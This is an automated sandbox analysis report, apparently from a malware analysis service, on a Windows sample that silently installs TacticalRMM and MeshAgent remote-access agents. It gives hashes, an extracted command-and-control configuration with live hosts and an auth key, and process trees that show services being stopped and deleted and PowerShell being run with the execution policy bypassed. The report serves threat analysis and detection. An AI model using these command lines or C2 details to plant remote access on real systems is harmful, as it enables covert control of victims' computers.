Analysis

  • max time kernel
    149s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    20-01-2025 02:03

General

  • Target

    2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    0e3dbb7d5032353cb14865e83fb9960c

  • SHA1

    e1382b357b797f3083f75b9c8242dcd349b88533

  • SHA256

    bb9d02d32e235b6c7453298f73cfd26fa89c5d0bbcd7a819d092835d4d038774

  • SHA512

    08b31d0f53e81ac2bd26456a02e61f8330ebe42f15019d1a052c4c0250477b67eae35026c91b81e39e1c42c8810341f60f5bfa806a23f343d40ce6a1bddf6de2

  • SSDEEP

    49152:Dkk1lQkvWuVMrb/TcvO90d7HjmAFd4A64nsfJW5B270PGUJ+GSZ05UU4SVaDs1CW:okvWuVrfz+ZUfVaA6El+ert

Malware Config

Extracted

Family

meshagent

Version

2

Botnet

TacticalRMM

C2

http://mesh.ztn.app:443/agent.ashx

Attributes
  • mesh_id

    0x1AC5A427D36E6A21D10128F481F9AC5A8DA677889ACD69D474A4B30819BCBFF7B979A19A780A3C6E50E3CD3AE57878ED

  • server_id

    58BA8120DEF0E4E89076972F82774D385B0F397F68F98E8BF0EF8B2C63F080982D35511B9CE190622EC6A4316C9AF531

  • wss

    wss://mesh.ztn.app:443/agent.ashx

Signatures

  • Detects MeshAgent payload 1 IoCs
  • MeshAgent

    MeshAgent is an open source remote access trojan written in C++.

  • Meshagent family
  • Blocklisted process makes network request 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 13 IoCs
  • Loads dropped DLL 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 6 IoCs
  • Drops file in Program Files directory 23 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Uses the powershell.exe command.

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-01-20_0e3dbb7d5032353cb14865e83fb9960c_frostygoop_hijackloader_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1448
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2800
      • C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$800B6,3660179,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:2856
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2716
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2580
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2552
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2548
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2568
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2624
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2676
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2848
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1036
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1360
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2820
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2232
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:1580
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2540
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:288
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          PID:600
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:988
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1132
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:872
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:2816
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.ztn.app --client-id 14 --site-id 37 --agent-type workstation --auth c52763ea5e8516c687c06875af1bd779e47c159661b3df56cdcc3c1a649244f4
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1724
      • C:\Program Files\TacticalAgent\meshagent.exe
        "C:\Program Files\TacticalAgent\meshagent.exe" -fullinstall
        3⤵
        • Sets service image path in registry
        • Executes dropped EXE
        • Drops file in Program Files directory
        PID:2960
      • C:\Program Files\Mesh Agent\MeshAgent.exe
        "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
        3⤵
        • Executes dropped EXE
        PID:2092
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    PID:2080
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      • Modifies data under HKEY_USERS
      • Suspicious use of AdjustPrivilegeToken
      PID:984
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1088
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1748
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:1312
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:2300
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:2328
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:996
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2476
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 2080 -s 472
      2⤵
      • Loads dropped DLL
      PID:2664
  • C:\Program Files\Mesh Agent\MeshAgent.exe
    "C:\Program Files\Mesh Agent\MeshAgent.exe"
    1⤵
    • Executes dropped EXE
    • Drops file in Program Files directory
    PID:2580
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:3032
    • C:\Windows\system32\wbem\wmic.exe
      wmic os get oslanguage /FORMAT:LIST
      2⤵
      PID:484
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:1100
    • C:\Windows\System32\wbem\wmic.exe
      wmic SystemEnclosure get ChassisTypes
      2⤵
      PID:2824
    • C:\Windows\System32\wbem\wmic.exe
      wmic ComputerSystem get PCSystemType /FORMAT:"C:\Windows\system32\wbem\en-US\csv"
      2⤵
      PID:2856
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2968
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2404
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:916
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noprofile -nologo -command -
      2⤵
      • Drops file in Program Files directory
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1772
  • C:\Program Files\TacticalAgent\tacticalrmm.exe
    "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m svc
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    PID:3064
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m checkrunner
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2872
    • C:\Program Files\Mesh Agent\MeshAgent.exe
      "C:\Program Files\Mesh Agent\MeshAgent.exe" -nodeid
      2⤵
      • Executes dropped EXE
      PID:1548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass C:\ProgramData\TacticalRMM\206812853.ps1
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:2304

                  Network

                  MITRE ATT&CK Enterprise v15

                  Downloads

                  • C:\Program Files\Mesh Agent\MeshAgent.db

                    Filesize

                    35KB

                    MD5

                    2e5c2d4e852d89af4580e2a48cd65a83

                    SHA1

                    912ab195ec9bd4dbb146f9debb72f30bf61ce864

                    SHA256

                    3d0c42d8a6de668e8e84aa1f1408de9cae536833bd056feeddb7f5898bcc3e0d

                    SHA512

                    b2cbf61a33a036b2bb9c157cf55d3e7870b71fc05d79c36aa1b07a422ebac2f671409934e0fceacb35b47b903f8c84a38934631b851d957c0dc0680f2f36c4e1

                  • C:\Program Files\Mesh Agent\MeshAgent.db

                    Filesize

                    153KB

                    MD5

                    50a9d8b7d49336d8882caccd2eabeea4

                    SHA1

                    15aa4c09778765058828c247153ec236d7428d59

                    SHA256

                    fd91335f4d8bcc1804636e955740438460cbf6ebb55a5d0f0977c1c15fdd6d1e

                    SHA512

                    ecc74f839fe88d74ac18ee6bec3429ed763bbd1497a13f2166894c4679a51bb37c50170260acdb1d5a05868c66d5a0d1598fc009c910e76b4ea4acf47a58e08d

                  • C:\Program Files\Mesh Agent\MeshAgent.msh

                    Filesize

                    31KB

                    MD5

                    abf1f93f3c86d44dc77bbd2d674e80fb

                    SHA1

                    e6b352be46bf02efc660477673bf2a84fc431935

                    SHA256

                    e07f7ec6f0eca86912458c385ba7f61b923374b220ff709319a508382aa6e1d6

                    SHA512

                    f50ab10e3855f387c08316c3a0c56e6a3b1af906847dccb925438e0ecfe064916faa00efd702aabf4f598a7117e35cd78fc80baa64e276b64925c528bd9e4832

                  • C:\Program Files\TacticalAgent\agent.log

                    Filesize

                    67B

                    MD5

                    6b45de0fdb7c8349a07ae2ecc7b685a8

                    SHA1

                    2b2ba75dd14ef642702db124826f1b319510fe39

                    SHA256

                    40dfebde5f8d820ce78a10abe60f5b0be9a33dc4404083820b77505abe47658b

                    SHA512

                    05a7000a64f6df5281131f24dba1d169552d79a4a41a4ee5a7c71c336e307efbd4d3c2620f3f83e0950619a76bc7a92d89eb0760081fc7c353f126d08e5e2e11

                  • C:\ProgramData\TacticalRMM\206812853.ps1

                    Filesize

                    35KB

                    MD5

                    e9fb33c49bee675e226d1afeef2740d9

                    SHA1

                    ded4e30152638c4e53db4c3c62a76fe0b69e60ab

                    SHA256

                    44e045ed5350758616d664c5af631e7f2cd10165f5bf2bd82cbf3a0bb8f63462

                    SHA512

                    2661a981d48d58c9ceb1992e55061ce07af0d53b5f38b07de620376e0ea1d876c7e50965e67aee80fe723968bdb956dc7fd93e7923608534c8fb4d21739dbc48

                  • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

                    Filesize

                    4.3MB

                    MD5

                    2f046950e65922336cd83bf0dbc9de33

                    SHA1

                    ddc64a8b21c8146c93c0b19c1eeb0ef784b980c6

                    SHA256

                    412e1f600251b21911c582e69381f677e663231f5e1d10786d88a026e00ea811

                    SHA512

                    a11cbf8b8b692d2d5a0e3af5a97f91a3d1f3e7aa39966eb7d62b3244b3913f2fdc21823d5c94de0d98e579f801709df44433af91567356361d5d9699a93b2cbc

                  • C:\Users\Admin\AppData\Local\Temp\is-FRDUA.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

                    Filesize

                    3.0MB

                    MD5

                    a639312111d278fee4f70299c134d620

                    SHA1

                    6144ca6e18a5444cdb9b633a6efee67aff931115

                    SHA256

                    4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

                    SHA512

                    f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

                    Filesize

                    914B

                    MD5

                    e4a68ac854ac5242460afd72481b2a44

                    SHA1

                    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

                    SHA256

                    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

                    SHA512

                    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                    Filesize

                    70KB

                    MD5

                    49aebf8cbd62d92ac215b2923fb1b9f5

                    SHA1

                    1723be06719828dda65ad804298d0431f6aff976

                    SHA256

                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                    SHA512

                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

                    Filesize

                    1KB

                    MD5

                    a266bb7dcc38a562631361bbf61dd11b

                    SHA1

                    3b1efd3a66ea28b16697394703a72ca340a05bd5

                    SHA256

                    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

                    SHA512

                    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

                    Filesize

                    252B

                    MD5

                    3c86de9e3a7f892b1e5415288e1812b9

                    SHA1

                    e311e5f4b9133e4103be895c1ae30825c96fcbc8

                    SHA256

                    5a6163a31567e2bd50ac78456f28c217a611aa239ffe34fd9d86a915ee47227e

                    SHA512

                    8f7fd37cad9223474a8eaf212cd23a245ca0371d480b2c6694150540f8d1ac92bd99c20d6ac3b18b05d2716d1fb5aca98ed17201c9c8fe01ef4375acf06409e0

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                    Filesize

                    342B

                    MD5

                    97bcc85179f449c0cd8ee01404e2f9b4

                    SHA1

                    de249ee3006aeeb15e0dcdb4d52843396adf4ced

                    SHA256

                    ec011b7c9d48627628980cd8b177c089f737a0731c8cee340c9db54a4c797442

                    SHA512

                    f908b7d5bb3d9bc9e6dfe0f0dde87108545fad092562b4f89e9e65fa09339dade8e8c8c3083a2a41e4fbb6251f983e386721bf0f3ad05b39f1ac9cd683753bbf

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                    Filesize

                    342B

                    MD5

                    68c92fe22aea9da2ad00428df6513d48

                    SHA1

                    c0af5bf2020794b2c231cf2476c36a1907cad6a4

                    SHA256

                    6547900b66a0cb13698c4377b8778e2e3f029c28313bafc06c57dd4cf8c5bbbf

                    SHA512

                    e8044e609d13cb328801d3517322d9b3c12f94d88e74f3669c97245d2c54c65c1502aa1b1b54ffc7ea847178d32b1b380e145e0934aae94d5180a5c81ce600e9

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                    Filesize

                    342B

                    MD5

                    6ac3299657f57000bd61a78c82e1c0b1

                    SHA1

                    e1ba738ecadb3bdf8ed95c7865a527693b61a000

                    SHA256

                    e0f02468066d79c01e3de332f2534bd522159e8d179d10361ced50a3279aefe3

                    SHA512

                    635396689cb75429a2ba80ea55553d5ce20aeb940545f4c7c88d0b2f50d9867543485db87b7f2a66af5dda03980ad614e6921201765ff5cc6ffffa34fccf941f

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                    Filesize

                    342B

                    MD5

                    26b2e466ffffbe1f672829d0763aa94f

                    SHA1

                    24514d69e88c41d68121faa14aa17966cbd71f84

                    SHA256

                    ced0f8ff4840d2791c46c070e8140ede799e89a31899024d8002913960280e09

                    SHA512

                    661b9c74cd5fd494c5a632bb41bd494aff855e73d4cf9fdc22f2f6b797a29ce70c85b5fa301697a9c2f0b90c540bbb70338e049864ddac197b1e18cf5c0f7c0e

                  • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

                    Filesize

                    242B

                    MD5

                    1ba190224ffa0eb0ccc1630e9094d131

                    SHA1

                    fc3bb2339abba67fecd0ce2b270815be05d87614

                    SHA256

                    2382316aa5302c6f06ae8591a0ec606d3461390e533d64dfabfa4bd71321cb00

                    SHA512

                    01fd6c0ead6789f4eb0d76be839a82f1e30afb56439aaee76e9180936d30edab4d802f87d55e0e31cedf554de41f5063513a8e73a9016a46a32aa853cae15904

                  • C:\Windows\Temp\CabD461.tmp

                    Filesize

                    29KB

                    MD5

                    d59a6b36c5a94916241a3ead50222b6f

                    SHA1

                    e274e9486d318c383bc4b9812844ba56f0cff3c6

                    SHA256

                    a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

                    SHA512

                    17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

                  • C:\Windows\Temp\TarD60D.tmp

                    Filesize

                    181KB

                    MD5

                    4ea6026cf93ec6338144661bf1202cd1

                    SHA1

                    a1dec9044f750ad887935a01430bf49322fbdcb7

                    SHA256

                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                    SHA512

                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                  • \Program Files\TacticalAgent\meshagent.exe

                    Filesize

                    3.3MB

                    MD5

                    e5d7d294c417575310a4472580a16257

                    SHA1

                    66be889ae2caeb288e81b4693087a38d7af14a03

                    SHA256

                    fd0cf4ace405f05f67784eea2dc9dada61d6ba16ff94165d9a9865c1b4745dbb

                    SHA512

                    c4dcb8b24592843e51ba9cd74ea0874a8aafeba255dad34d94399683f2fd56858388e39255c478a981ba5537ebf7e54000a4ea4ab862289efc0eab9de2683fc6

                  • \Program Files\TacticalAgent\tacticalrmm.exe

                    Filesize

                    9.2MB

                    MD5

                    bb383b7c3d5e4acb1001ab099b5b0f3c

                    SHA1

                    cb0c85f84a454aa4b1aab02bfba47c4355c2311e

                    SHA256

                    a6d3159c858aa3704f35d69b27829618ad0d1bae894c848a5233100c17464f95

                    SHA512

                    157dda96d1cacea55a6be27b9d432225b47d7334e664e577cef82a14c7eb1be1b8b84423b3905a4c1caecb5394be264d9b5c3e32109a4893e51a9d406ce740be

                  • memory/988-24-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/988-25-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/996-64-0x000000001B4A0000-0x000000001B782000-memory.dmp

                    Filesize

                    2.9MB

                  • memory/996-65-0x0000000001D40000-0x0000000001D48000-memory.dmp

                    Filesize

                    32KB

                  • memory/1724-35-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-36-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-93-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-92-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-81-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-140-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-142-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-82-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-33-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-34-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-80-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-75-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/1724-74-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/2476-76-0x000000001B340000-0x000000001B622000-memory.dmp

                    Filesize

                    2.9MB

                  • memory/2476-77-0x0000000001C00000-0x0000000001C08000-memory.dmp

                    Filesize

                    32KB

                  • memory/2800-30-0x0000000000400000-0x00000000004D7000-memory.dmp

                    Filesize

                    860KB

                  • memory/2800-7-0x0000000000401000-0x00000000004B7000-memory.dmp

                    Filesize

                    728KB

                  • memory/2800-4-0x0000000000400000-0x00000000004D7000-memory.dmp

                    Filesize

                    860KB

                  • memory/2856-14-0x0000000000400000-0x0000000000712000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2856-29-0x0000000000400000-0x0000000000712000-memory.dmp

                    Filesize

                    3.1MB

                  • memory/2872-289-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/3064-144-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/3064-198-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/3064-147-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB

                  • memory/3064-143-0x0000000140000000-0x00000001405E8000-memory.dmp

                    Filesize

                    5.9MB